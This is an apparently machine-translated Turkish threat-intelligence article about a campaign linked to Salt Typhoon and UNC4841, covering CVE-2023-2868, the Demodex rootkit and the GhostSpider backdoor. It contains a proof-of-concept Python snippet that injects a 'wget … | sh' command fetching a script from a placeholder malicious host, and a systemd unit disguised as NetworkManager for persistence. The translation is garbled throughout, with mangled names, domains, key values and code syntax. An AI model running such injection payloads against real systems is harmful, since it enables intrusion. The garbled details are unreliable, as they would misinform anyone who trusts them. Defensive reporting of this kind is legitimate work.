Siber güvenlik araştırmacıları, 2024 kapanış aylarında sofistike bir kampanya izlemeye başladılar ve birden fazla kıtada hem hükümeti hem de kurumsal ağları hedeflediler.
Bu operasyonun arkasındaki tehdit aktörleri, sözlü olarak tuz tayfası ve UNC4841 olarak bilinen, örtüşen altyapıdan kaldırıldı ve gizli ve kalıcılığı en üst düzeye çıkarmak için paylaşılan taktikler.
İlk infiltrasyon, kamuya açık sunuculardaki eşleştirilmemiş uzaktan kod yürütme güvenlik açıklarının kullanılması ve ardından ısmarlama arka kapıların dağıtımıyla elde edilmiştir.
Etkilenen kuruluşlar anormal DNS sorguları ve açıklanamayan giden HTTPS trafiğini PulseathMmakf gibi alanlara bildirdi[.]Com ve Infraredsen[.]daha sonra Salt Typhoon’un Komuta ve Kontrol (C2) ağına atfedilen com.
Sessiz Push analistleri, rakiplerin enfeksiyon vektörünün genellikle kurumsal e-posta ağ geçitlerinde sıfır günlük bir kusurdan yararlanarak başladığını belirtti.
Belgelenmiş bir olayda, UNC4841, ilk erişimi oluşturmak için Barracuda E-posta Güvenlik Ağ Geçidi cihazında CVE-2023-2868’den yararlandı.
.webp)
Sıkıştırma sonrası saldırganlar, çekirdek düzeyinde kalıcılığını ve konakçı tabanlı algılama mekanizmalarının kaçınmasını kolaylaştıran Demodex adlı özelleştirilmiş bir rootkit yüklediler.
Aynı zamanda, Salt Typhoon, standart bağlantı noktaları üzerinden iletişim kurarak ve imza tabanlı algılamayı önlemek için randomize HTTP başlıklarını kullanarak meşru trafik modellerine karışmak için tasarlanmış iki ek arka kapı (SnappyBee ve Ghostspider) kullandı.
Sessiz Push Araştırmacılar, alan adı kayıt kayıtları paylaşılan e -posta tescil ettirenleri ve anlamsız protonmail adreslerine bağlı SOA Mbox girişlerini ortaya çıkardığında bu iki grubun yakınsamasını belirlediler.
Bu altyapı örtüşmesi, iki APT kümesi arasında koordineli bir çaba veya kaynak paylaşımı önerdi.
WHOIS verilerini DNS A-Record Looks ile ilişkilendirerek, analistler, her iki tehdit aktörüyle ilişkili daha önce bildirilmemiş 45’ten fazla alanı ortaya çıkardılar ve proaktif savunma önlemleri için bilinen gösterge setini genişletti.
Enfeksiyon ve kalıcılık mekanizmaları
Enfeksiyon zinciri, savunmasız yazılım modüllerinden yararlanan hazırlanmış bir HTTP isteği ile başlar. Silent Push tarafından sağlanan bir kavram kanıtı snippet, istismarın teslimat yükünü göstermektedir:-
import requests
exploit_url = "https://victim.example.com/api/exec?cmd="
payload = "wget http://malicious.server/ghostspider.sh -O- | sh"
response = requests. Get(exploit_url + payload)
print("Exploit delivered, status:", response.status_code)Başarılı bir sömürü üzerine, Ghostspider Backdoor komut dosyası randomize bir ad altında bir sistem hizmeti olarak yüklenir.
Meydan okulu ana bilgisayarlarda keşfedilen hizmet birimi dosyası:-
[Unit]
Description=NetworkManager Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/ghostspider --config /etc/ghostspider.conf
[Install]
WantedBy=multi-user.targetBu teknik, önyüklemede otomatik yürütmeyi sağlarken /etc/ghostspider.conf Ağ Beacons’ı kısmak için şifreli C2 uç noktaları ve uyku zamanlayıcıları içerir.
Daha fazla tespitten kaçınmak için, saldırganlar çift katmanlı bir kalıcılık taktiği uyguladılar: önce servis ünitesi aracılığıyla ve daha sonra sonlandırılırsa arka kapıyı izleyen ve yeniden başlatan bir cron iş aracılığıyla.
Sessiz Push analistleri, şifre çözme rutini bellekten çıkardı ve hem yapılandırma dosyalarına hem de ağ trafik yüklerine uygulanan hafif bir XOR Cipher’i ortaya çıkardı.
Şifre anahtarı, 0x4Fsert kodlanmış ancak her 120 saatte bir dinamik olarak döndürülür, bu da basit statik analizi önler.
Bu enfeksiyon ve kalıcılık taktiklerinin kesintisiz entegrasyonu, tuz tayfun ve UNC4841’in gelişmiş yeteneklerinin altını çizmektedir.
Kuruluşlar, bilinen kötü amaçlı alanlar için DNS ve WHOIS telemetrisini denetlemeye ve anormal süreç lansmanlarını ve şifreli C2 trafiğini tanımlamak için davranış tabanlı algılama dağıtmaya çağırılır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.